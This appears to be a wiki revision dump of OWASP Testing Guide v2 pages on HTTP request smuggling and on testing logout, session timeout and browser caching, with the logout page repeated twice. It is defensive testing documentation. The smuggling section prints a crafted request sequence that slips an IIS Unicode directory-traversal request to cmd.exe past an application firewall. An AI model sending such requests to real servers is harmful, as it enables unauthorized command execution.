===HTTP Splitting===
A successful exploitation of HTTP Splitting is greatly helped by knowing some details of the web application and of the attack target.
For instance, different targets can use different methods to decide when the first HTTP message ends and when the second starts. Some will use the message boundaries, as in the previous example. Other targets will assume that different messages will be carried by different packets. Others will allocate for each message a number of chunks of predetermined length: in this case, the second message will have to start exactly at the beginning of a chunk and this will require the tester to use padding between the two messages. This might cause some trouble when the vulnerable parameter is to be sent in the URL, as a very long URL is likely to be truncated or filtered. A gray box scenario can help the attacker to find a workaround: several application servers, for instance, will allow the request to be sent using POST instead of GET.

===HTTP Smuggling===
As mentioned in the introduction, HTTP Smuggling leverages the different ways that a particularly crafted HTTP message can be parsed and interpreted by different agents (browsers, web caches, application firewalls). This relatively new kind of attack was first discovered by Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin in 2005. There are several possible applications and we will analyze one of the most spectacular: the bypass of an application firewall. Refer to the original whitepaper (linked at the bottom of this page) for more detailed information and other scenarios.

'''Application Firewall Bypass'''

There are several products that enable a system administration to detect and block a hostile web request depending on some known malicious pattern that is embedded in the request. One very old example is the infamous Unicode directory traversal attack against IIS server (http://www.securityfocus.com/bid/1806), in which an attacker could break out the www root by issuing a request like:
<pre>
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+<command_to_execute>
</pre>
Of course, it is quite easy to spot and filter this attack by the presence of strings like ".." and "cmd.exe" in the URL. However, IIS 5.0 appears to be able to handle a POST request whose body is up to 48K bytes, truncating all content that is beyond this limit. The pen-tester can leverage this by creating a very large request, structured as follows:
<pre>
POST /target.asp HTTP/1.1 <-- Request #1
Host: target
Connection: Keep-Alive
Content-Length: 49223
<CRLF>
<49150 bytes of garbage>
POST /target.asp HTTP/1.0 <-- Request #2
Connection: Keep-Alive
Content-Length: 33
<CRLF>
POST /target.asp HTTP/1.0 <-- Request #3
xxxx: POST /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 <-- Request #4
Connection: Keep-Alive
<CRLF>
</pre>

What happens here is that the Request #1 is made of 49223 bytes, which includes also the lines of Request #2. Therefore, a firewall (or any other agent beside IIS 5.0) will see Request #1, will fail to see Request #2 (its data will be just part of #1), will see Request #3 and miss Request #4 (because the POST will be just part of the fake header xxxx).
Now, what happens to IIS 5.0 ? It will stop parsing Request #1 right after the <CRLF> and will therefore parse Request #2 as a new, separate request. Request #2 claims that its content is 33 bytes, which includes everything until "xxxx: ", making IIS miss Request #3 (interpreted as part of Request #2) but spot Request #4, as its POST starts right after the 33rd byte or Request #2. It is a bit complicated, but the point is that the attack URL will not be detected by the firewall (it will be interpreted as the body of a previous request) but will be correctly parsed (and executed) by IIS.

Note that HTTP Smuggling does *not* exploit any vulnerability in the target web application. Therefore, it might be somewhat tricky, in a pen-test engagement, to convince the client that a countermeasure should be looked for anyway.

== References ==
'''Whitepapers'''
* Amit Klein, "Divide and Conquer: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" - http://www.watchfire.com/news/whitepapers.aspx
* Chaim Linhart, Amit Klein, Ronen Heled, Steve Orrin, "HTTP Request Smuggling" - http://www.watchfire.com/news/whitepapers.aspx 

{{Category:OWASP Testing Project AoC}}

Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)

2006-12-04T21:55:57Z

Icesurfer:

Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)

2006-12-04T20:49:21Z

Icesurfer:

Icesurfer: /* References */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
In this phase we check that the logout function is properly implemented, and that it is not possible to “reuse” a session after such logout. We also check that the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.
 
== Description of the Issue ==
The end a web session is usually triggered by one of the following two events:
 
* The user logs out
* The user remains idle for a certain amount of time and the application automatically logs him/her out
 
Both cases must be implemented carefully, in order to avoid to introduce weaknesses that could be exploited by an attacker to gain unauthorized access. More specifically, the logout function must ensure that all session tokens (e.g.: cookies) are properly destroyed or made unusable, and that proper controls are enforced at the server side to forbid them to be used again. If such actions are not properly carried out, an attacker could replay these session tokens in order to “resurrect” the session of a legitimate user and virtually impersonate him/her (this attack is usually known as 'cookie replay'). Of course, a mitigating factor is that the attacker needs to be able to access those tokens (that are stored on the victim PC), but in a variety of cases it might not be too difficult. The most common scenario for this kind of attack is a public computer that is used to access some private information (e.g.: webmail, online bank account, ...): when the user has finished using the application and logs out, if the logout process is not properly enforced the following user could access the same account, for instance by simply pressing the “back” button of the browser. Another scenario can result from a Cross Site Scripting vulnerability or a connection that is not 100% protected by SSL: a flawed logout function would make stolen cookies useful for a much longer time, making life for the attacker much easier.
The third test of this chapter is aimed to check that the application forbids the browser to cache sensitive data, which again would pose a danger to an user accessing the application from a public computer.
 
== Black Box testing and examples ==
'''Logout function:''' 
The first step is to test the presence of the logout function. Check that the application provides a logout button and that this button is present and well visible on all pages that require authentication to be accessed. A logout button that is not clearly visible, or that is present only on certain pages, poses a security risk, as the user might forget to use it at the end of his/her session.

The second step consists in checking what happens to the session tokens when the logout function is invoked. For instance, when cookies are used a proper behavior is to erase all session cookies, by issuing a new Set-Cookie directive that sets their value to a non-valid one (e.g.: “NULL” or some equivalent value) and, if the cookie is persistent, setting its expiration date in the past, which tells the browser to discard the cookie. So, if the authentication page originally sets a cookie in the following way:

<pre>
Set-Cookie: SessionID=sjdhqwoy938eh1q; expires=Sun, 29-Oct-2006 12:20:00 GMT; path=/; domain=victim.com
</pre>
the logout function should trigger a response somewhat resembling the following:
<pre>
Set-Cookie: SessionID=noauth; expires=Sat, 01-Jan-2000 00:00:00 GMT; path=/; domain=victim.com
</pre>
The first (and simplest) test at this point consists in logging out and then hitting the 'back' button of the browser, to check whether we are still authenticated. If we are, it means that the logout function has been implemented insecurely, and that the logout function does not destroy the session IDs. This happens sometimes with applications that use non-persistent cookies and that require the user to close his browser in order to effectively erase such cookies from memory. Some of these applications provide a warning to the user, suggesting her to close her browser, but this solution completely relies on the user behavior, and results in a lower level of security compared to destroying the cookies. Other applications might try to close the browser using JavaScript, but that again is a solution that relies on the client behavior, which is intrinsically less secure, since the client browser could be configured to limit the execution of scripts (and in this case a configuration that had the goal of increasing security would end up decreasing it). Moreover, the effectiveness of this solution would be dependent on the browser vendor, version and settings (e.g.: the JavaScript code might successfully close an Internet Explorer instance but fail to close a Firefox one).

If by pressing the 'back' button we can access previous pages but not access new ones then we are simply accessing the browser cache. If these pages contain sensitive data, it means that the application did not forbid the browser to cache it (by not setting the Cache-Control header, a different kind of problem that we will analyze later).

After the “back button” technique has been tried, it's time for something a little more sophisticated: we can re-set the cookie to the original value and check whether we can still access the application in an authenticated fashion. If we can, it means that there is not a server-side mechanism that keeps track of active and non active cookies, but that the correctness of the information stored in the cookie is enough to grant access. To set a cookie to a determined value we can use WebScarab and, intercepting one response of the application, insert a Set-Cookie header with our desired values:
 
[[image:TestingGuide-LogoutTest-fig1.png]]
 
Alternatively, we can install a cookie editor in our browser (e.g.: Add N Edit Cookies in Firefox):
 
[[image:TestingGuide-LogoutTest-fig2.png]]
 
A notable example of a design where there is no control at server side about cookies that belong to users that have already logged out is ASP.NET FormsAuthentication class, where the cookie is basically an encrypted and authenticated version of the user details that are decrypted and checked by the server side. While this is very effective in preventing cookie tampering, the fact that the server does not maintain an internal record of the session status means that it is possible to launch a cookie replay attack after the legitimate user has logged out, provided that the cookie has not expired yet (see the references for further detail).

It should be noted that this test only applies to session cookies, and that a persistent cookie that only stores data about some minor user preferences (e.g.: site appearance) and that is not deleted when the user logs out is not to be considered a security risk.
 
'''Timeout logout''' 
The same approach that we have seen in the previous section can be applied when measuring the timeout logout. The most appropriate logout time should be a right balance between security (shorter logout time) and usability (longer logout time) and heavily depends on the criticality of the data handled by the application. A 60 minutes logout time for a public forum can be acceptable, but such a long time would be way too much in a home banking application. In any case, any application that does not enforce a timeout-based logout should be considered not secure, unless such a behavior is addressing a specific functional requirement.
The testing methodology is very similar to the one outlined in the previous paragraph. First we have to check whether a timeout exists, for instance logging in and then killing some time reading some other Testing Guide chapter, waiting for the timeout logout to be triggered. As in the logout function, after the timeout has passed all session tokens should be destroyed or be unusable. We also need to understand whether the timeout is enforced by the client or by the server (or both). Getting back to our cookie example, if the session cookie is non-persistent (or, more in general, the session token does not store any data about the time) we can be sure that the timeout is enforced by the server. If the session token contains some time related data (e.g.: login time, or last access time, or expiration date for a persistent cookie), then we know that the client is involved in the timeout enforcing. In this case, we need to modify the token (if it's not cryptographically protected) and see what happens to our session. For instance, we can set the cookie expiration date far in the future and see whether our session can be prolonged. As a general rule, everything should be checked server-side and it should not be possible, re-setting the session cookies to previous values, to be able to access the application again.
 '''Cached pages''' 
Logging out from an application obviously does not clear the browser cache of any sensitive information that might have been stored. Therefore, another test that is to be performed is to check that our application does not leak any critical data into the browser cache. In order to do that, we can use WebScarab and search through the server responses that belong to our session, checking that for every page that contains sensitive information the server instructed the browser not to cache any data. Such a directive can be issued in the HTTP response headers:
<pre>
HTTP/1.1:
Cache-Control: no-cache
</pre>
<pre>
HTTP/1.0:
Pragma: no-cache
Expires: <past date or illegal value (e.g.: 0)>
</pre>
 
Alternatively, the same effect can be obtained directly at the HTML level, including in each page that contains sensitive data the following code:
<pre>
HTTP/1.1:
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
</pre>
<pre>
HTTP/1.0:
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV=”Expires” CONTENT=”Sat, 01-Jan-2000 00:00:00 GMT”>
</pre> 
For instance, if we are testing an e-commerce application, we should look for all pages that contain a credit card number or some other financial information, and check that all those pages enforce the no-cache directive.
On the other hand, if we find pages that contain critical information but that fail to instruct the browser not to cache their content, we know that sensitive information will be stored on the disk, and we can double-check that simply by looking for it in the browser cache. The exact location where that information is stored depends on the client operating system and on the browser that has been used, but here are some examples:

* Mozilla Firefox:
** Unix/Linux: ~/.mozilla/firefox/<profile-id>/Cache/
** Windows: C:\Documents and Settings\<user_name>\Local Settings\Application Data\Mozilla\Firefox\Profiles\<profile-id>\Cache>

* Internet Explorer:
** C:\Documents and Settings\<user_name>\Local Settings\Temporary Internet Files>
 

== Gray Box testing and example ==
The gray box testing is not much different from the black box one. In a gray box testing we can assume we have some partial knowledge about the session management of our application, and that should help us in understanding whether the logout and timeout functions are properly secured. As a general rule, we need to check that:
* The logout function effectively destroys all session token, or at least render them unusable
* The server performs proper checks on the session state, disallowing an attacker to replay some previous token
* A timeout is enforced and it is properly checked by the server. If the server uses an expiration time that is read from a session token that is sent by the client, the token must be cryptographically protected
 
For the secure cache test, the methodology is equivalent to the black box case, as in both scenarios we have full access to the server response headers and to the HTML code.
 
== References ==
* ASP.NET Forms Authentication - Best Practices for Software Developers: http://www.foundstone.com/resources/whitepapers/ASPNETFormsAuthentication.pdf
* The FormsAuthentication.SignOut method does not prevent cookie reply attacks in ASP.NET applications: http://support.microsoft.com/default.aspx?scid=kb;en-us;900111
 
== Tools ==
* Add N Edit Cookies (Firefox estension): https://addons.mozilla.org/firefox/573/
 
{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Logout and Browser Cache Management (OWASP-AT-007)

2006-11-02T15:09:51Z

Icesurfer: /* Black Box testing and examples */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
In this phase we check that the logout function is properly implemented, and that it is not possible to “reuse” a session after such logout. We also check that the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.
 
== Description of the Issue ==
The end a web session is usually triggered by one of the following two events:
 
* The user logs out
* The user remains idle for a certain amount of time and the application automatically logs him/her out
 
Both cases must be implemented carefully, in order to avoid to introduce weaknesses that could be exploited by an attacker to gain unauthorized access. More specifically, the logout function must ensure that all session tokens (e.g.: cookies) are properly destroyed or made unusable, and that proper controls are enforced at the server side to forbid them to be used again. If such actions are not properly carried out, an attacker could replay these session tokens in order to “resurrect” the session of a legitimate user and virtually impersonate him/her (this attack is usually known as 'cookie replay'). Of course, a mitigating factor is that the attacker needs to be able to access those tokens (that are stored on the victim PC), but in a variety of cases it might not be too difficult. The most common scenario for this kind of attack is a public computer that is used to access some private information (e.g.: webmail, online bank account, ...): when the user has finished using the application and logs out, if the logout process is not properly enforced the following user could access the same account, for instance by simply pressing the “back” button of the browser. Another scenario can result from a Cross Site Scripting vulnerability or a connection that is not 100% protected by SSL: a flawed logout function would make stolen cookies useful for a much longer time, making life for the attacker much easier.
The third test of this chapter is aimed to check that the application forbids the browser to cache sensitive data, which again would pose a danger to an user accessing the application from a public computer.
 
== Black Box testing and examples ==
'''Logout function:''' 
The first step is to test the presence of the logout function. Check that the application provides a logout button and that this button is present and well visible on all pages that require authentication to be accessed. A logout button that is not clearly visible, or that is present only on certain pages, poses a security risk, as the user might forget to use it at the end of his/her session.

The second step consists in checking what happens to the session tokens when the logout function is invoked. For instance, when cookies are used a proper behavior is to erase all session cookies, by issuing a new Set-Cookie directive that sets their value to a non-valid one (e.g.: “NULL” or some equivalent value) and, if the cookie is persistent, setting its expiration date in the past, which tells the browser to discard the cookie. So, if the authentication page originally sets a cookie in the following way:

<pre>
Set-Cookie: SessionID=sjdhqwoy938eh1q; expires=Sun, 29-Oct-2006 12:20:00 GMT; path=/; domain=victim.com
</pre>
the logout function should trigger a response somewhat resembling the following:
<pre>
Set-Cookie: SessionID=noauth; expires=Sat, 01-Jan-2000 00:00:00 GMT; path=/; domain=victim.com
</pre>
The first (and simplest) test at this point consists in logging out and then hitting the 'back' button of the browser, to check whether we are still authenticated. If we are, it means that the logout function has been implemented insecurely, and that the logout function does not destroy the session IDs. This happens sometimes with applications that use non-persistent cookies and that require the user to close his browser in order to effectively erase such cookies from memory. Some of these applications provide a warning to the user, suggesting her to close her browser, but this solution completely relies on the user behavior, and results in a lower level of security compared to destroying the cookies. Other applications might try to close the browser using JavaScript, but that again is a solution that relies on the client behavior, which is intrinsically less secure, since the client browser could be configured to limit the execution of scripts (and in this case a configuration that had the goal of increasing security would end up decreasing it). Moreover, the effectiveness of this solution would be dependent on the browser vendor, version and settings (e.g.: the JavaScript code might successfully close an Internet Explorer instance but fail to close a Firefox one).

If by pressing the 'back' button we can access previous pages but not access new ones then we are simply accessing the browser cache. If these pages contain sensitive data, it means that the application did not forbid the browser to cache it (by not setting the Cache-Control header, a different kind of problem that we will analyze later).

After the “back button” technique has been tried, it's time for something a little more sophisticated: we can re-set the cookie to the original value and check whether we can still access the application in an authenticated fashion. If we can, it means that there is not a server-side mechanism that keeps track of active and non active cookies, but that the correctness of the information stored in the cookie is enough to grant access. To set a cookie to a determined value we can use WebScarab and, intercepting one response of the application, insert a Set-Cookie header with our desired values:
 
[[image:TestingGuide-LogoutTest-fig1.png]]
 
Alternatively, we can install a cookie editor in our browser (e.g.: Add N Edit Cookies in Firefox):
 
[[image:TestingGuide-LogoutTest-fig2.png]]
 
A notable example of a design where there is no control at server side about cookies that belong to users that have already logged out is ASP.NET FormsAuthentication class, where the cookie is basically an encrypted and authenticated version of the user details that are decrypted and checked by the server side. While this is very effective in preventing cookie tampering, the fact that the server does not maintain an internal record of the session status means that it is possible to launch a cookie replay attack after the legitimate user has logged out, provided that the cookie has not expired yet (see the references for further detail).

It should be noted that this test only applies to session cookies, and that a persistent cookie that only stores data about some minor user preferences (e.g.: site appearance) and that is not deleted when the user logs out is not to be considered a security risk.
 
'''Timeout logout''' 
The same approach that we have seen in the previous section can be applied when measuring the timeout logout. The most appropriate logout time should be a right balance between security (shorter logout time) and usability (longer logout time) and heavily depends on the criticality of the data handled by the application. A 60 minutes logout time for a public forum can be acceptable, but such a long time would be way too much in a home banking application. In any case, any application that does not enforce a timeout-based logout should be considered not secure, unless such a behavior is addressing a specific functional requirement.
The testing methodology is very similar to the one outlined in the previous paragraph. First we have to check whether a timeout exists, for instance logging in and then killing some time reading some other Testing Guide chapter, waiting for the timeout logout to be triggered. As in the logout function, after the timeout has passed all session tokens should be destroyed or be unusable. We also need to understand whether the timeout is enforced by the client or by the server (or both). Getting back to our cookie example, if the session cookie is non-persistent (or, more in general, the session token does not store any data about the time) we can be sure that the timeout is enforced by the server. If the session token contains some time related data (e.g.: login time, or last access time, or expiration date for a persistent cookie), then we know that the client is involved in the timeout enforcing. In this case, we need to modify the token (if it's not cryptographically protected) and see what happens to our session. For instance, we can set the cookie expiration date far in the future and see whether our session can be prolonged. As a general rule, everything should be checked server-side and it should not be possible, re-setting the session cookies to previous values, to be able to access the application again.
 '''Cached pages''' 
Logging out from an application obviously does not clear the browser cache of any sensitive information that might have been stored. Therefore, another test that is to be performed is to check that our application does not leak any critical data into the browser cache. In order to do that, we can use WebScarab and search through the server responses that belong to our session, checking that for every page that contains sensitive information the server instructed the browser not to cache any data. Such a directive can be issued in the HTTP response headers:
<pre>
HTTP/1.1:
Cache-Control: no-cache
</pre>
<pre>
HTTP/1.0:
Pragma: no-cache
Expires: <past date or illegal value (e.g.: 0)>
</pre>
 
Alternatively, the same effect can be obtained directly at the HTML level, including in each page that contains sensitive data the following code:
<pre>
HTTP/1.1:
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
</pre>
<pre>
HTTP/1.0:
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV=”Expires” CONTENT=”Sat, 01-Jan-2000 00:00:00 GMT”>
</pre> 
For instance, if we are testing an e-commerce application, we should look for all pages that contain a credit card number or some other financial information, and check that all those pages enforce the no-cache directive.
On the other hand, if we find pages that contain critical information but that fail to instruct the browser not to cache their content, we know that sensitive information will be stored on the disk, and we can double-check that simply by looking for it in the browser cache. The exact location where that information is stored depends on the client operating system and on the browser that has been used, but here are some examples:

* Mozilla Firefox:
** Unix/Linux: ~/.mozilla/firefox/<profile-id>/Cache/
** Windows: C:\Documents and Settings\<user_name>\Local Settings\Application Data\Mozilla\Firefox\Profiles\<profile-id>\Cache>

* Internet Explorer:
** C:\Documents and Settings\<user_name>\Local Settings\Temporary Internet Files>
 

== Gray Box testing and example ==
The gray box testing is not much different from the black box one. In a gray box testing we can assume we have some partial knowledge about the session management of our application, and that should help us in understanding whether the logout and timeout functions are properly secured. As a general rule, we need to check that:
* The logout function effectively destroys all session token, or at least render them unusable
* The server performs proper checks on the session state, disallowing an attacker to replay some previous token
* A timeout is enforced and it is properly checked by the server. If the server uses an expiration time that is read from a session token that is sent by the client, the token must be cryptographically protected
 
For the secure cache test, the methodology is equivalent to the black box case, as in both scenarios we have full access to the server response headers and to the HTML code.
 
== References ==
* ASP.NET Forms Authentication - Best Practices for Software Developers: http://www.foundstone.com/resources/whitepapers/ASPNETFormsAuthentication.pdf
* The FormsAuthentication.SignOut method does not prevent cookie reply attacks in ASP.NET applications: http://support.microsoft.com/default.aspx?scid=kb;en-us;900111
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]